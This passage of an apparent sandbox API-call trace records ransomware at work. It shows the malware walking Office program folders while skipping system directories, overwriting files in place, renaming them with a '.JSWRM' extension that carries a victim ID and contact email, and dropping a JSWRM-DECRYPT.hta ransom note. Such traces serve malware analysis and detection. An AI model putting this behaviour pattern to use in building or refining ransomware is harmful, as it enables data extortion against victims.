lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0071.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPP.VBS", cchWideChar=8, lpMultiByteStr=0x345f278, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSPP.VBS", lpUsedDefaultChar=0x0) returned 8 [0071.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0071.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0071.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0071.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0071.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.958] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=94467) returned 1 [0071.958] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17100) returned 0x24b1c8 [0071.958] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x17100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x17100, lpOverlapped=0x0) returned 1 [0071.966] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.966] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x17100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x17100, lpOverlapped=0x0) returned 1 [0071.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0071.966] CloseHandle (hObject=0x458) returned 1 [0071.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0071.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0071.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0071.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0071.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0071.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0071.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0071.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f848 [0071.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0071.967] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.VBS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.vbs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0071.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0071.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0071.967] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9f60362, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x6a40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="OSPPREARM.EXE", cAlternateFileName="OSPPRE~1.EXE")) returned 1 [0071.967] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2=".") returned 1 [0071.967] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="..") returned 1 [0071.967] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="...") returned 1 [0071.967] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="windows") returned -1 [0071.967] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="recovery") returned -1 [0071.967] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="perflogs") returned -1 [0071.967] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="documents and settings") returned 1 [0071.967] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="$RECYCLE.BIN") returned 1 [0071.967] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="system volume information") returned -1 [0071.967] lstrcmpiW (lpString1="OSPPREARM.EXE", lpString2="msocache") returned 1 [0071.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0071.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPPREARM.EXE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPPREARM.EXE", cchWideChar=13, lpMultiByteStr=0x345f2a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSPPREARM.EXE", lpUsedDefaultChar=0x0) returned 13 [0071.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0071.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0071.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPPREARM.EXE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OSPPREARM.EXE", cchWideChar=13, lpMultiByteStr=0x345f278, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OSPPREARM.EXE", lpUsedDefaultChar=0x0) returned 13 [0071.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0071.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0071.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0071.968] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd502d600, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0xda9a8629, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd502d600, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x8df0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="SLERROR.XML", cAlternateFileName="")) returned 1 [0071.968] lstrcmpiW (lpString1="SLERROR.XML", lpString2=".") returned 1 [0071.968] lstrcmpiW (lpString1="SLERROR.XML", lpString2="..") returned 1 [0071.968] lstrcmpiW (lpString1="SLERROR.XML", lpString2="...") returned 1 [0071.968] lstrcmpiW (lpString1="SLERROR.XML", lpString2="windows") returned -1 [0071.968] lstrcmpiW (lpString1="SLERROR.XML", lpString2="recovery") returned 1 [0071.968] lstrcmpiW (lpString1="SLERROR.XML", lpString2="perflogs") returned 1 [0071.968] lstrcmpiW (lpString1="SLERROR.XML", lpString2="documents and settings") returned 1 [0071.968] lstrcmpiW (lpString1="SLERROR.XML", lpString2="$RECYCLE.BIN") returned 1 [0071.968] lstrcmpiW (lpString1="SLERROR.XML", lpString2="system volume information") returned -1 [0071.968] lstrcmpiW (lpString1="SLERROR.XML", lpString2="msocache") returned 1 [0071.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0071.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SLERROR.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SLERROR.XML", cchWideChar=11, lpMultiByteStr=0x345f2a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SLERROR.XML", lpUsedDefaultChar=0x0) returned 11 [0071.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0071.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0071.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SLERROR.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SLERROR.XML", cchWideChar=11, lpMultiByteStr=0x345f278, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SLERROR.XML", lpUsedDefaultChar=0x0) returned 11 [0071.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0071.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0071.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0071.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0071.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0071.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0071.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0071.969] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=36336) returned 1 [0071.969] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.969] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8df0) returned 0x24b1c8 [0071.969] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x8df0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x8df0, lpOverlapped=0x0) returned 1 [0072.015] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.015] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x8df0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x8df0, lpOverlapped=0x0) returned 1 [0072.015] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.015] CloseHandle (hObject=0x458) returned 1 [0072.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0072.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0072.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0072.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0072.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0072.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0072.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ede0 [0072.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0072.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.016] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0072.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0072.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.017] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd502d600, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0xda9a8629, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd502d600, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x8df0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="SLERROR.XML", cAlternateFileName="")) returned 0 [0072.017] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0072.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0072.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0072.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0072.017] FindNextFileW (in: hFindFile=0x231e40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf982bd9c, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="PackageManifests", cAlternateFileName="PACKAG~1")) returned 1 [0072.017] lstrcmpiW (lpString1="PackageManifests", lpString2=".") returned 1 [0072.017] lstrcmpiW (lpString1="PackageManifests", lpString2="..") returned 1 [0072.017] lstrcmpiW (lpString1="PackageManifests", lpString2="...") returned 1 [0072.017] lstrcmpiW (lpString1="PackageManifests", lpString2="windows") returned -1 [0072.017] lstrcmpiW (lpString1="PackageManifests", lpString2="recovery") returned -1 [0072.017] lstrcmpiW (lpString1="PackageManifests", lpString2="perflogs") returned -1 [0072.017] lstrcmpiW (lpString1="PackageManifests", lpString2="documents and settings") returned 1 [0072.017] lstrcmpiW (lpString1="PackageManifests", lpString2="$RECYCLE.BIN") returned 1 [0072.017] lstrcmpiW (lpString1="PackageManifests", lpString2="system volume information") returned -1 [0072.017] lstrcmpiW (lpString1="PackageManifests", lpString2="msocache") returned 1 [0072.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0072.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0072.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0072.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0072.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0072.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0072.017] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\jswrm-decrypt.hta")) returned 0xffffffff [0072.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0072.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0072.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0072.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0072.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0072.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0072.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0072.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0072.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0072.020] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.020] WriteFile (in: hFile=0x454, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0072.021] CloseHandle (hObject=0x454) returned 1 [0072.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0072.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0072.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0072.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0072.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0072.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0072.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0072.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0072.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0072.021] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\jswrm-decrypt.hta")) returned 0x20 [0072.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0072.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0072.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.022] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x21973808, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0072.022] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0072.022] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x21973808, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0072.023] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0072.023] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0072.023] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834f7581, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834f7581, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5e91c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", cAlternateFileName="APA05A~1.XML")) returned 1 [0072.023] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.023] lstrcmpiW (lpString1="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.023] lstrcmpiW 